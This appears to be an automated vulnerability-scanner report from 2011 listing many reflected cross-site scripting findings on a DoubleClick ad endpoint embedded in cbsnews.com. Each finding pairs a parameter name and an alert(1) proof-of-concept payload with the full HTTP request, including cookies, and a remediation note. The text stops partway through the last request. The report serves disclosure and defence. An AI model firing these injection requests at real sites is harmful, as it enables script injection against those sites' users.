GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=56f8d"-alert(1)-"1d00a0e4e7e&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page ...[SNIP]... %3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=56f8d"-alert(1)-"1d00a0e4e7e&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html"); var w ...[SNIP]...
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18f6d"-alert(1)-"51b7a82ca5c was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=18f6d"-alert(1)-"51b7a82ca5c HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page ...[SNIP]... 0&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=18f6d"-alert(1)-"51b7a82ca5chttp://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var winH = ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae410"-alert(1)-"76768d80340 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cnae410"-alert(1)-"76768d80340&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d8a3"-alert(1)-"87b5e52dc7f was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US9d8a3"-alert(1)-"87b5e52dc7f&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23571"-alert(1)-"929e9d3e54f was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=10023571"-alert(1)-"929e9d3e54f&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af8af"-alert(1)-"f718173ff91 was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253aaf8af"-alert(1)-"f718173ff91&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebd9b"-alert(1)-"c91cb2fcc46 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=ebd9b"-alert(1)-"c91cb2fcc46&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 187a9"-alert(1)-"5e0ae5f8a64 was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com187a9"-alert(1)-"5e0ae5f8a64&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77abb"-alert(1)-"9e34f2ad84d was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=277abb"-alert(1)-"9e34f2ad84d&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3abcf"-alert(1)-"07297bb7caf was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com3abcf"-alert(1)-"07297bb7caf&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eb5f"-alert(1)-"0a4a4487f8 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=13039462327604510206412523eb5f"-alert(1)-"0a4a4487f8&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page ...[SNIP]... =2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=13039462327604510206412523eb5f"-alert(1)-"0a4a4487f8&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 902bf"-alert(1)-"e7b97166ecf was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=902bf"-alert(1)-"e7b97166ecf&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 721eb"-alert(1)-"5e3375eee1a was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100721eb"-alert(1)-"5e3375eee1a&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82d00"-alert(1)-"a0d2f28156c was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=82d00"-alert(1)-"a0d2f28156c&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44562"-alert(1)-"289e63f792d was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=200044562"-alert(1)-"289e63f792d&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc8ee"-alert(1)-"db20965c259 was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243cc8ee"-alert(1)-"db20965c259&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 